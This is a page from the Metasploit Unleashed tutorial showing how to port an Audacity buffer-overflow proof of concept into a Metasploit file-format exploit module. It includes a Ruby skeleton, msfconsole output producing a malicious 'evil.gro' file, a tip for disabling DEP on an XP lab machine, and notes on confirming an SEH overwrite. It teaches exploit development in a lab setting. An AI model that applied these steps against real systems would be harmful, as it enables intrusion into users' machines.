Using The Egghunter Mixin

From Metasploit Unleashed
Jump to: navigation, search

The MSF egghunter mixin is a wonderful module which can be of great use in exploit development. If you're not familiar with the concepts of egghunters, read this.

A vulnerability in the Audacity Audio Editor presents us with an opportunity to examine this mixin in greater depth. In the next module, we will exploit Audacity and create a Metasploit file format exploit module for it. We will not focus on the exploitation method itself or the theory behind it - but dive right into the practical usage of the Egghunter mixin.

Please note, the following example uses Microsoft's Windows XP SP2 as it's target. If you wish to reproduce the following you'll need to setup your own VM. If SP2 is not available to you, SP3 can be used but make sure to disable DEP in the 'boot.ini' file using the following: /noexecute=AlwaysOff
Setting up Audacity

  • Download and install the vulnerable software on your XP SP2 box:


Porting the PoC

Let's port this POC to an MSF file format exploit module. We can use an existing module to get a general template. The zinfaudioplayer221_pls.rb exploit provides us with a good start.

Our skeleton exploit should look similar to this. Notice our buffer being generated here:

 def exploit
    buff = Rex::Text.pattern_create(2000)
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buff)
 end

We use Rex::Text.pattern_create(2000) to create a unique string of 2000 bytes in order to be able to track buffer locations in the debugger.

Once we have the POC ported, we generate the exploit file and transfer it to our Windows box. Use the generic/debug_trap payloads to begin with.

msf exploit(audacity) > show options

Module options:

Name       Current Setting Required Description
----       --------------- -------- -----------
FILENAME   evil.gro        yes      The file name.
OUTPUTPATH /var/www        yes      The location of the file.


Payload options (generic/debug_trap):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Audacity Universal 1.2


msf exploit(audacity) > exploit

[*] Creating 'evil.gro' file ...
[*] Generated output file /var/www/evil.gro
[*] Exploit completed, but no session was created.
msf exploit(audacity) >

We open Audacity, attach a debugger to it and import the MIDI gro file.

Pre-attach-00.png



We immediately get an exception from Audacity, and the debugger pauses:

Attach-00.png



A quick look at the SEH chain shows that we have overwritten an exception handler.

Aud-seh-00.png



We take the exception (shift + F9), and see the following:

Aud-seh-01.png




Exploit Development > Using The Egghunter Mixin